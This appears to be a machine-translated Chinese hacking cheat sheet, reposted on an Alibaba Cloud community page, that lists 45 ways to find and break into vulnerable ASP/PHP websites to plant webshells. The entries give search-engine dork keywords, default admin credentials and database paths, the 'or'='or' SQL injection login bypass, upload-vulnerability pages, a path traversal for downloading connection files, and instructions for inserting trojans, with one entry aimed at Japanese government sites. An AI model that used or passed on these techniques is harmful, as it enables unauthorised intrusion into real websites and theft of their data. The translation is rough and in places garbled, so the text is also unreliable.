45 webshell programs

Source: Internet
Author: User
Tags vbulletin
1. Search for some keywords on Google. Edit. asp? South Korea has many bots, most of which are MSSQL databases!

2,
Go to Google, site: cq.cn inurl: ASP

3,
Use a zombie and an ASP Trojan.
The file name is login. asp.
Path group is/manage/
Keyword: went. asp
Use 'or' = 'or' to log on

4,
Keywords: CO net MIB ver 1.0 website background management system

The account password is 'or' = 'or'

5.
Dynamic Shopping System
Inurl: Help. asp login, if not registered as a member!

You can select either upload_bm1.asp or upload_c1.asp. Generally, administrators ignore these two vulnerabilities.

6.
Default database address blogdata/acblog. asa
Keyword: acblog

7.
Baidu/htdocs
You can directly upload the ASA file during registration!

8.
/Database/# newasp. MDB
Keywords: newasp sitemanagesystem version

9.
Excavator
Keyword: powered by webboy
Page:/upfile. asp

10.
Search Keyword ver5.0 build 0519 in Baidu
(Upload vulnerability exists)

11.
Upfile_article.asp BBS/upfile. asp
Keyword: powered by mypower,

12.
Inurl: winnt \ system32 \ inetsrv \ enter this in Google to find many websites

13.
Now Google searches for the keyword intitle: Website Assistant inurl: ASP

14.
Key words: homepage latest dynamic new user guide dance music download center classicArticleGamer elegance equipment purchase station rumors friendship connection local forum

Add setup. asp to the keyword

15.
Database of VBulletin Forum
Default database address!
/Shortdes/functions. php
Tools:
1. Web site HUNTER: Baidu Google!
2. Google
Keywords:
Powered by: VBulletin version 3.0.1
Powered by: VBulletin version 3.0.2
Powered by: VBulletin version 3.0.3
One of them is enough.

16.
1. Open Baidu or Google search and enter powered by comersus ASP shopping cart
Open source. This is a mall system.
2. There is a comersus open technologies LC at the bottom of the website. Open it and check it ~~ Comersus system ~
Guess, comersus. MDB. Is the Database Name
All databases are placed after the database,
So database/comersus. MDB
Comersus_listcategoriestree.asp is replaced by database/comersus. mdb, which cannot be downloaded.
Remove the previous ''store/'', and add database/comersus. MDB.

17.
LegendProgram.
1. backend management address: http: // your domain name/msmiradmin/
2. Default background management account: msmir
3. Default background management password: msmirmsmir
The database file is http: // your domain name/msmirdata/msmirarticle. MDB
The database connection file is **********/Conn. asp.

18.
Enter/skins/default/in Baidu/

19.
Excavator
Key servers: power by discuz
Path:/wish. php
Cooperation:
Discuz! Wish. php Remote Inclusion Vulnerability tool in the Forum

20.
Upload Vulnerability.
Tool: domain3.5
Website hunter version 1.5
Keyword: powered by mypower
Insert upfile_photo.asp to the detected page or file

21.
New cloud Vulnerabilities
This vulnerability is available for both access and SQL.
Google searches for keywords "about this site-website help-advertising cooperation-download Declaration-friendship connection-website map-manage Logon"
Put Flash/downfile. asp? Url = uploadfile/.../../Conn. asp submitted to the website root directory. You can download conn. asp
Most download sites, such as source code and software.
We often encounter a problem where the database is in front or in the middle + # You can replace it with % 23 to download it.
\ Database \ % 23newasp. MDB
For example: # Change xzws. mdb to % 23xzws. MDB

22.
All shopping malls + power upload Systems

Tool used: Xiaoji V1.1 mingxiao
Mall intrusion:
Keywords: purchase-> Add to shopping cart-> go to cashier-> confirm Recipient Information-> select payment method-> select delivery method-> online payment or remittance after order-> remittance confirmation-> delivery-> complete
Vulnerability page: Upload. asp
Upfile_flash.asp

Dynamic intrusion:
Keyword: powered by mypower
Vulnerability page: upfile_photo.asp
Upfile_soft.asp
Upfile_adpic.asp
Upfile_softpic.asp

23.
Injection Vulnerability
Baidu search: oioj's blog

24
Ease of operation
Column directory
Admin_articlerecyclebin.asp
Inurl: admin_articlerecyclebin.asp

25.
Tool: web site hunter
Keywords: inurl: went. asp
Suffix: Manage/login. asp
Password: 'or' = 'or'

26.
Intrusion into Warcraft private server
Required tool: ASP Trojan.
Domain3.5 mingkido
Keyword: All right reserved design: Game Alliance
Background address: admin/login. asp
Database address: chngame/# chngame. MDB

27.
The vulnerability is caused by an error in the IIS settings of the Administrator.
The Baidu keyword is a rare Script Name.
Dynamic Network: reloadforumcache. asp
Leadbbs: makealltopanc. asp
Bbsxp: admin_fso.asp
Ease of use: admin_articlerecyclebin.asp

28.
Database explosion vulnerability on foreign sites
Keyword: Sad Raven's Guestbook
Password address:/passwd. dat
Background address:/admin. php

29.
Discuz 4.1.0 cross-site Vulnerability
Tools used: 1. WAP browser
2. WAP encoding Converter
Keyword: "intext: discuz! 4.1.0"

30.
Keyword: sunnex
Background path/system/manage. asp
Directly upload an ASP Trojan

31.
Tools
1: web site hunter
2: DAMA
Keywords: Do not disable cookies; otherwise, you will not be able to log on
Insert DIY. asp

32.
Keywords: team5 studio All Rights Reserved
Default Database: Data/team. MDB

33.
Tool: excavator auxiliary database Reader
Keywords: Enterprise Profile product display product list
Suffix:/database/myszw. MDB
Background address: admin/login. asp

34.
Key sub-xxx inurl: nclass. asp
Write a trojan in "system settings.
Will be saved to config. asp.

35.
Use webshell without entering the background
Data. asp? Action = backupdata default path for Online Database Backup

36.
Tool: webshell
Keyword: inurl: went. asp
Suffix: Manage/login. asp
Weak Password: 'or' = 'or'

37.
Keyword: powered by: qcdn_news
Scan the article and add a 'to test the injection points.
Background address: admin_index.asp

38.
Intrude into leichi News Publishing System
Keyword: leichinews
Remove the values after leichinews.
MARK: admin/uploadpic. asp? Actiontype = mod & picname = xuanran. asp
Upload the trojan again .....
Access uppic anran. asp to log on to the Trojan.

39.
Keywords: Power System of article management ver 3.0 Build 20030628
Default Database: Database \ yiuwekdsodksldfslwifds. MDB
Background address: scan by yourself!

40.
1. Search for a large number of injection points through Google
Keyword: asp? Id = 1 gov.jp/asp? Id =
Page: 100
Language: Enter the language of the country you want to intrude.

41.
Keyword: powered by: 94 kkbbs 2005
Retrieve admin Using password retrieval
Q: ddddd answer: ddddd

42.
Keyword: inurl: went. asp
The background is manage/login. asp.
Background password: 'or' = 'or'
Default database address: database/Datashop. MDB

43.
Keyword: ***** inurl: readnews. asp
Change the last/to % 5c, perform database brute-force attacks, view the password, and go to the background.
Add a piece of news and enter a trojan in the title.

44.
Tool: one-sentence Trojan
Bbsxp 5.0 SP1 administrator Interpreter
Keywords: powered by bbsxp5.00
Back up a sentence in the background!

45.
Keywords: Program core: bjxshop online shop expert
Background:/admin

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.